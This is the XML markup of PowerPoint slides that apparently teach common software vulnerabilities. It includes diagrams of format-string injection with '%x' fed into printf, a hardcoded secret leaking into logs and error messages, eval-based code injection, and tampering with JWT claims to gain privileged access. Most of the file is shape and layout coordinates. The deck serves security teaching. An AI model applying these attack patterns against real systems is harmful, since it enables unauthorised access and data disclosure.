            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2173320" y="2702520"/>
            <a:ext cx="1174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: </a:t>
            </a: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AAAAA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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4021200" y="1530720"/>
            <a:ext cx="1118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Program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TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4046400" y="2500920"/>
            <a:ext cx="11548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 = </a:t>
            </a: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AAAA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 = </a:t>
            </a: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i!\0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1232640" y="57240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Format String Injection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8" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2762280" y="1922040"/>
            <a:ext cx="2024640" cy="2459880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="449" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1061280" y="2640240"/>
            <a:ext cx="1048320" cy="1548720"/>
            <a:chOff x="1061280" y="2640240"/>
            <a:chExt cx="1048320" cy="1548720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="450" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1071720" y="2640240"/>
              <a:ext cx="950400" cy="95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51" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1061280" y="3550680"/>
              <a:ext cx="104832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452" name="Curved Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="450" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2022120" y="3111120"/>
            <a:ext cx="971640" cy="4680"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38917"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2198880" y="2760120"/>
            <a:ext cx="490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%x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Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3226320" y="1640160"/>
            <a:ext cx="1118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Program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TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3050280" y="2910600"/>
            <a:ext cx="1470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secret = </a:t>
            </a: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123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56" name="Curved Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647240" y="3098520"/>
            <a:ext cx="1088640" cy="14760"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25041"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="TextBox 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4497840" y="2726280"/>
            <a:ext cx="1411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printf("</a:t>
            </a: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%x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")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8" name="Picture 13" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="3837" r="2090" b="67680"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639760" y="2492640"/>
            <a:ext cx="1072800" cy="1262880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5679720" y="2092680"/>
            <a:ext cx="964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Log file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TextBox 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5875560" y="2894760"/>
            <a:ext cx="572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123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1232640" y="57240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Hardcoded Password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2" name="Picture 1" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2762280" y="1922040"/>
            <a:ext cx="2024640" cy="2459880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="463" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="989280" y="2640240"/>
            <a:ext cx="1222920" cy="1365120"/>
            <a:chOff x="989280" y="2640240"/>
            <a:chExt cx="1222920" cy="1365120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="464" name="Graphic 1" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1001520" y="2640240"/>
              <a:ext cx="1108800" cy="1045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65" name="TextBox 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="989280" y="3641400"/>
              <a:ext cx="12229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466" name="Curved Connector 1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2023920" y="3111120"/>
            <a:ext cx="969840" cy="7200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25027"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3226320" y="1640160"/>
            <a:ext cx="1118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Program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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3050280" y="2910600"/>
            <a:ext cx="1470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secret = </a:t>
            </a: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123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69" name="Curved Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647240" y="3098520"/>
            <a:ext cx="1088640" cy="14760"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25041"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="TextBox 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4433400" y="2726280"/>
            <a:ext cx="154044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71" name="Picture 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="3837" r="2090" b="67680"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5783760" y="2492640"/>
            <a:ext cx="1072800" cy="1262880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5745240" y="1828800"/>
            <a:ext cx="12448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Privileged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Access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TextBox 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4892040" y="2726280"/>
            <a:ext cx="572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123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xfrm>
            <a:off x="1232640" y="57240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Error Message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5" name="Picture 22" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2762280" y="1922040"/>
            <a:ext cx="2024640" cy="2459880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="476" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="701280" y="2532240"/>
            <a:ext cx="1222920" cy="1365120"/>
            <a:chOff x="701280" y="2532240"/>
            <a:chExt cx="1222920" cy="1365120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="477" name="Graphic 2" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="713520" y="2532240"/>
              <a:ext cx="1108800" cy="1045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8" name="TextBox 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="701280" y="3533400"/>
              <a:ext cx="12229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479" name="Curved Connector 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1879920" y="3105720"/>
            <a:ext cx="969840" cy="7200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25027"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3226320" y="1640160"/>
            <a:ext cx="1118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Program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1" name="TextBox 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3050640" y="2910600"/>
            <a:ext cx="14702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Error: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secret = </a:t>
            </a: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123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82" name="Curved Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647240" y="3098520"/>
            <a:ext cx="1088640" cy="14760"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25041"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="TextBox 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4433400" y="2726280"/>
            <a:ext cx="154044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84" name="Picture 23" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="3837" r="2090" b="67680"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5783760" y="2492640"/>
            <a:ext cx="1072800" cy="1262880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5745240" y="1828800"/>
            <a:ext cx="12448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Privileged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Access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6" name="TextBox 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4892040" y="2726280"/>
            <a:ext cx="572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123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Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1563120" y="2679840"/>
            <a:ext cx="1508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Invoke Error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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1232640" y="57240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Code Injection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9" name="Picture 25" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3230280" y="1922040"/>
            <a:ext cx="2024640" cy="2459880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="490" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1329120" y="2743200"/>
            <a:ext cx="1195200" cy="1365120"/>
            <a:chOff x="1329120" y="2743200"/>
            <a:chExt cx="1195200" cy="1365120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="491" name="Graphic 4" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1341000" y="2743200"/>
              <a:ext cx="1083600" cy="1045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92" name="TextBox 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1329120" y="3744360"/>
              <a:ext cx="11952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493" name="Curved Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="491" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2424600" y="3111120"/>
            <a:ext cx="1037160" cy="155160"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38020"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="TextBox 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2432880" y="2760120"/>
            <a:ext cx="959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&lt;code&gt;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Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3694320" y="1640160"/>
            <a:ext cx="1118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Program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6" name="TextBox 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3491640" y="2910600"/>
            <a:ext cx="1523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eval(</a:t>
            </a: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&lt;code&gt;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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1232640" y="57240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Signature Verification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8" name="Picture 27" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="2057400"/>
            <a:ext cx="1051560" cy="1277640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="499" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1017000" y="2971800"/>
            <a:ext cx="1195200" cy="1365120"/>
            <a:chOff x="1017000" y="2971800"/>
            <a:chExt cx="1195200" cy="1365120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="500" name="Graphic 7" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1028880" y="2971800"/>
              <a:ext cx="1083600" cy="1045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01" name="TextBox 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1017000" y="3972960"/>
              <a:ext cx="11952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502" name="Curved Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1985040" y="2293200"/>
            <a:ext cx="3403080" cy="789480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5458320" y="1712160"/>
            <a:ext cx="1118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Program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04" name="Curved Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="10800000">
            <a:off x="2176920" y="3101040"/>
            <a:ext cx="3198600" cy="201240"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="505" name="Curved Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2233440" y="3970080"/>
            <a:ext cx="3190680" cy="797400"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25005"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="506" name="Picture 28" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="3837" r="2090" b="67680"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5525640" y="4362480"/>
            <a:ext cx="1072800" cy="1262880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5487120" y="3770640"/>
            <a:ext cx="12448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Privileged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Access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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="2625480"/>
            <a:ext cx="1142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1) Login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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="3200400"/>
            <a:ext cx="1142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2) JWT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0" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="4800600"/>
            <a:ext cx="32000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3) JWT with modified claims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 type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687960" y="57240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Improper Input Validation</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:endParaRPr b="1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2" name="Picture 29" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="2057400"/>
            <a:ext cx="1051560" cy="1277640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="513" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1017000" y="2971800"/>
            <a:ext cx="1195200" cy="1365120"/>
            <a:chOff x="1017000" y="2971800"/>
            <a:chExt cx="1195200" cy="1365120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="514" name="Graphic 8" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1028880" y="2971800"/>
              <a:ext cx="1083600" cy="1045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15" name="TextBox 47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1017000" y="3972960"/>
              <a:ext cx="11952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516" name="Curved Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1985040" y="2293200"/>
            <a:ext cx="3403080" cy="789480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5458320" y="1712160"/>
            <a:ext cx="1118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Program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18" name="Curved Connector 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="512" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5763960" y="3578400"/>
            <a:ext cx="491400" cy="5040"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="519" name="Picture 30" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="3837" r="2090" b="67680"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5525640" y="4218480"/>
            <a:ext cx="1072800" cy="1262880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5086440" y="3770640"/>
            <a:ext cx="20480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Completed Order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1" name=""/>
          <p:cNvSpPr/>
